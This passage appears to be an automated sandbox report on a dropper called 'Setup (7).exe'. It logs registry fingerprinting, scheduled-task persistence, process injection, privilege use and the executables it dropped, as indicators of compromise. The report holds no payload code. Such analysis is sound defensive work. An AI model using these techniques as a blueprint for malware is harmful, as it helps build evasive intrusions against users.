\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 1EdD3teN6KkB5VqAYDo5FDa6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 s6XkU3VdWErp3FIa9CIA2Ojx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier s6XkU3VdWErp3FIa9CIA2Ojx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 5074643.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 1EdD3teN6KkB5VqAYDo5FDa6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 7noQoxsVgLBBtgcZWelnZEHN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 1EdD3teN6KkB5VqAYDo5FDa6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 5074643.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString T1vR4WrDcDSogjCwBQvMGbKr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz s6XkU3VdWErp3FIa9CIA2Ojx.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5712 schtasks.exe 9324 schtasks.exe 5004 schtasks.exe 5644 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 9448 timeout.exe 9936 timeout.exe 10272 timeout.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS s6XkU3VdWErp3FIa9CIA2Ojx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU T1vR4WrDcDSogjCwBQvMGbKr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 1EdD3teN6KkB5VqAYDo5FDa6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 1EdD3teN6KkB5VqAYDo5FDa6.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU T1vR4WrDcDSogjCwBQvMGbKr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU s6XkU3VdWErp3FIa9CIA2Ojx.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 1EdD3teN6KkB5VqAYDo5FDa6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS lBobHeUIxCiZQkJ8azQApo1T.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 7noQoxsVgLBBtgcZWelnZEHN.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU lBobHeUIxCiZQkJ8azQApo1T.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 1EdD3teN6KkB5VqAYDo5FDa6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU T1vR4WrDcDSogjCwBQvMGbKr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 4 IoCs
pid Process 6068 taskkill.exe 10080 taskkill.exe 2560 taskkill.exe 5556 taskkill.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 8432 PING.EXE -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 88 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 91 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 133 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 223 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 383 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 390 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4784 Setup (7).exe 4784 Setup (7).exe 3104 WerFault.exe 3104 WerFault.exe 2996 Process not Found 2996 Process not Found 1092 msedge.exe 1092 msedge.exe 2572 WerFault.exe 2572 WerFault.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 5548 J77cmUgJX0OQi4nZtiqUPG2L.exe 1640 WerFault.exe 1640 WerFault.exe 1560 WerFault.exe 1560 WerFault.exe 424 WerFault.exe 424 WerFault.exe 7152 msedge.exe 7152 msedge.exe 7076 1EdD3teN6KkB5VqAYDo5FDa6.exe 7076 1EdD3teN6KkB5VqAYDo5FDa6.exe 4984 msedge.exe 4984 msedge.exe 3608 s6XkU3VdWErp3FIa9CIA2Ojx.exe 3608 s6XkU3VdWErp3FIa9CIA2Ojx.exe 6628 WerFault.exe 6628 WerFault.exe 7600 5074643.exe 7600 5074643.exe 1860 1378248.exe 1860 1378248.exe 8020 identity_helper.exe 8020 identity_helper.exe 5572 2729210.exe 5572 2729210.exe 7908 Setup.exe 7908 Setup.exe 7908 Setup.exe 7908 Setup.exe 7908 Setup.exe 7908 Setup.exe 7908 Setup.exe 7908 Setup.exe 5524 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5524 s6XkU3VdWErp3FIa9CIA2Ojx.exe 1896 Process not Found 1896 Process not Found 5728 2118516.exe 5728 2118516.exe 5004 schtasks.exe 5004 schtasks.exe 2432 EKn_OVLBdja5sVWvxioG1V7M.exe 2432 EKn_OVLBdja5sVWvxioG1V7M.exe 2432 EKn_OVLBdja5sVWvxioG1V7M.exe 2432 EKn_OVLBdja5sVWvxioG1V7M.exe 8448 lBobHeUIxCiZQkJ8azQApo1T.exe 8448 lBobHeUIxCiZQkJ8azQApo1T.exe -
Suspicious behavior: SetClipboardViewer 6 IoCs
pid Process 6716 4983392.exe 4420 WinHoster.exe 7840 4908786.exe 3020 7114776.exe 8024 2727179.exe 10960 8110651.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2248 P16ofDXrRIjcgmlh_CM6ho3M.exe Token: SeRestorePrivilege 3104 WerFault.exe Token: SeBackupPrivilege 3104 WerFault.exe Token: SeDebugPrivilege 3352 pS1lAs69AU4dP7M5ZxgsPSZ4.exe Token: SeRestorePrivilege 2572 WerFault.exe Token: SeBackupPrivilege 2572 WerFault.exe Token: SeRestorePrivilege 2996 Process not Found Token: SeBackupPrivilege 2996 Process not Found Token: SeRestorePrivilege 3104 WerFault.exe Token: SeBackupPrivilege 3104 WerFault.exe Token: SeBackupPrivilege 3104 WerFault.exe Token: SeDebugPrivilege 6068 taskkill.exe Token: SeDebugPrivilege 5572 2729210.exe Token: SeDebugPrivilege 5728 2118516.exe Token: SeDebugPrivilege 5516 s6XkU3VdWErp3FIa9CIA2Ojx.exe Token: SeDebugPrivilege 1860 1378248.exe Token: SeDebugPrivilege 5524 s6XkU3VdWErp3FIa9CIA2Ojx.exe Token: SeDebugPrivilege 2524 LivelyScreenRecS3.0.exe Token: SeDebugPrivilege 2432 EKn_OVLBdja5sVWvxioG1V7M.exe Token: SeDebugPrivilege 1168 Conhost.exe Token: SeDebugPrivilege 1096 7ErLa0RFLI6vyU7MyTq31upS.exe Token: SeDebugPrivilege 1896 Process not Found Token: SeDebugPrivilege 6604 2064906.exe Token: SeDebugPrivilege 5540 1031968.exe Token: SeManageVolumePrivilege 1548 md8_8eus.exe Token: SeDebugPrivilege 5220 1EdD3teN6KkB5VqAYDo5FDa6.exe Token: SeTcbPrivilege 7892 svchost.exe Token: SeTcbPrivilege 7892 svchost.exe Token: SeTcbPrivilege 7892 svchost.exe Token: SeTcbPrivilege 7892 svchost.exe Token: SeTcbPrivilege 7892 svchost.exe Token: SeTcbPrivilege 7892 svchost.exe Token: SeDebugPrivilege 5252 7noQoxsVgLBBtgcZWelnZEHN.exe Token: SeDebugPrivilege 7232 4586601.exe Token: SeDebugPrivilege 7620 1802667.exe Token: SeDebugPrivilege 5244 4718977.exe Token: SeDebugPrivilege 6060 7noQoxsVgLBBtgcZWelnZEHN.exe Token: SeManageVolumePrivilege 5300 note866.exe Token: SeDebugPrivilege 7116 3177725.exe Token: SeDebugPrivilege 8696 yKlAn4PvSTKCx88WwWHG4VZA.exe Token: SeDebugPrivilege 6936 5681660.exe Token: SeDebugPrivilege 9204 s6XkU3VdWErp3FIa9CIA2Ojx.exe Token: SeDebugPrivilege 7180 6366479.exe Token: SeDebugPrivilege 7936 2876392.exe Token: SeDebugPrivilege 10080 taskkill.exe Token: SeDebugPrivilege 8260 lBobHeUIxCiZQkJ8azQApo1T.exe Token: SeDebugPrivilege 8300 4192131.exe Token: SeDebugPrivilege 10008 7noQoxsVgLBBtgcZWelnZEHN.exe Token: SeDebugPrivilege 8124 7395402.exe Token: SeDebugPrivilege 9192 s6XkU3VdWErp3FIa9CIA2Ojx.exe Token: SeDebugPrivilege 8672 7noQoxsVgLBBtgcZWelnZEHN.exe Token: SeDebugPrivilege 2560 taskkill.exe Token: SeDebugPrivilege 8832 wfIV8jV52oMTs8swOrJDTUfg.exe Token: SeDebugPrivilege 10016 1EdD3teN6KkB5VqAYDo5FDa6.exe Token: SeDebugPrivilege 6604 2064906.exe Token: SeDebugPrivilege 7744 7159097.exe Token: SeDebugPrivilege 9832 4672625.exe Token: SeDebugPrivilege 4508 5292272.exe Token: SeDebugPrivilege 10036 7577952.exe Token: SeDebugPrivilege 6376 lBobHeUIxCiZQkJ8azQApo1T.exe Token: SeDebugPrivilege 5556 1EdD3teN6KkB5VqAYDo5FDa6.exe Token: SeDebugPrivilege 7600 5074643.exe Token: SeDebugPrivilege 6492 1960639.exe Token: SeDebugPrivilege 8952 T1vR4WrDcDSogjCwBQvMGbKr.exe -
Suspicious use of FindShellTrayWindow 13 IoCs
pid Process 3372 yS9T56oZWXoqJTlZbDPY26ud.tmp 3572 s6XkU3VdWErp3FIa9CIA2Ojx.exe 4984 msedge.exe 8196 Tra.exe.com 8196 Tra.exe.com 8196 Tra.exe.com 9336 L0CqMRweDWlOuC5qBSMsI5gb.tmp 5828 Tra.exe.com 5828 Tra.exe.com 5828 Tra.exe.com 5676 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5676 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5676 s6XkU3VdWErp3FIa9CIA2Ojx.exe -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 8196 Tra.exe.com 8196 Tra.exe.com 8196 Tra.exe.com 5828 Tra.exe.com 5828 Tra.exe.com 5828 Tra.exe.com 5676 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5676 s6XkU3VdWErp3FIa9CIA2Ojx.exe 5676 s6XkU3VdWErp3FIa9CIA2Ojx.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4784 wrote to memory of 4556 4784 Setup (7).exe 84 PID 4784 wrote to memory of 4556 4784 Setup (7).exe 84 PID 4784 wrote to memory of 4556 4784 Setup (7).exe 84 PID 4784 wrote to memory of 828 4784 Setup (7).exe 83 PID 4784 wrote to memory of 828 4784 Setup (7).exe 83 PID 4784 wrote to memory of 828 4784 Setup (7).exe 83 PID 4784 wrote to memory of 2248 4784 Setup (7).exe 82 PID 4784 wrote to memory of 2248 4784 Setup (7).exe 82 PID 4784 wrote to memory of 3212 4784 Setup (7).exe 81 PID 4784 wrote to memory of 3212 4784 Setup (7).exe 81 PID 4784 wrote to memory of 3212 4784 Setup (7).exe 81 PID 4784 wrote to memory of 908 4784 Setup (7).exe 80 PID 4784 wrote to memory of 908 4784 Setup (7).exe 80 PID 4784 wrote to memory of 908 4784 Setup (7).exe 80 PID 4784 wrote to memory of 472 4784 Setup (7).exe 91 PID 4784 wrote to memory of 472 4784 Setup (7).exe 91 PID 4784 wrote to memory of 472 4784 Setup (7).exe 91 PID 4784 wrote to memory of 716 4784 Setup (7).exe 89 PID 4784 wrote to memory of 716 4784 Setup (7).exe 89 PID 4784 wrote to memory of 716 4784 Setup (7).exe 89 PID 4784 wrote to memory of 552 4784 Setup (7).exe 90 PID 4784 wrote to memory of 552 4784 Setup (7).exe 90 PID 4784 wrote to memory of 552 4784 Setup (7).exe 90 PID 4784 wrote to memory of 1080 4784 Setup (7).exe 88 PID 4784 wrote to memory of 1080 4784 Setup (7).exe 88 PID 4784 wrote to memory of 1096 4784 Setup (7).exe 87 PID 4784 wrote to memory of 1096 4784 Setup (7).exe 87 PID 4784 wrote to memory of 1096 4784 Setup (7).exe 87 PID 4784 wrote to memory of 1872 4784 Setup (7).exe 98 PID 4784 wrote to memory of 1872 4784 Setup (7).exe 98 PID 4784 wrote to memory of 1872 4784 Setup (7).exe 98 PID 4784 wrote to memory of 1896 4784 Setup (7).exe 97 PID 4784 wrote to memory of 1896 4784 Setup (7).exe 97 PID 4784 wrote to memory of 1896 4784 Setup (7).exe 97 PID 4784 wrote to memory of 2000 4784 Setup (7).exe 96 PID 4784 wrote to memory of 2000 4784 Setup (7).exe 96 PID 4784 wrote to memory of 2000 4784 Setup (7).exe 96 PID 4784 wrote to memory of 2052 4784 Setup (7).exe 95 PID 4784 wrote to memory of 2052 4784 Setup (7).exe 95 PID 4784 wrote to memory of 2052 4784 Setup (7).exe 95 PID 4784 wrote to memory of 2432 4784 Setup (7).exe 93 PID 4784 wrote to memory of 2432 4784 Setup (7).exe 93 PID 4784 wrote to memory of 2432 4784 Setup (7).exe 93 PID 4784 wrote to memory of 2468 4784 Setup (7).exe 92 PID 4784 wrote to memory of 2468 4784 Setup (7).exe 92 PID 4784 wrote to memory of 2468 4784 Setup (7).exe 92 PID 4784 wrote to memory of 2352 4784 Setup (7).exe 102 PID 4784 wrote to memory of 2352 4784 Setup (7).exe 102 PID 4784 wrote to memory of 2352 4784 Setup (7).exe 102 PID 4784 wrote to memory of 3804 4784 Setup (7).exe 105 PID 4784 wrote to memory of 3804 4784 Setup (7).exe 105 PID 4784 wrote to memory of 3804 4784 Setup (7).exe 105 PID 4784 wrote to memory of 2376 4784 Setup (7).exe 104 PID 4784 wrote to memory of 2376 4784 Setup (7).exe 104 PID 4784 wrote to memory of 2376 4784 Setup (7).exe 104 PID 4784 wrote to memory of 2080 4784 Setup (7).exe 103 PID 4784 wrote to memory of 920 4784 Setup (7).exe 101 PID 4784 wrote to memory of 2080 4784 Setup (7).exe 103 PID 4784 wrote to memory of 2080 4784 Setup (7).exe 103 PID 4784 wrote to memory of 920 4784 Setup (7).exe 101 PID 4784 wrote to memory of 920 4784 Setup (7).exe 101 PID 4784 wrote to memory of 4448 4784 Setup (7).exe 108 PID 4784 wrote to memory of 4448 4784 Setup (7).exe 108 PID 4784 wrote to memory of 4448 4784 Setup (7).exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\Documents\xsX_K9gzdoPQHq2lB6Th8U3h.exe"C:\Users\Admin\Documents\xsX_K9gzdoPQHq2lB6Th8U3h.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:908 -
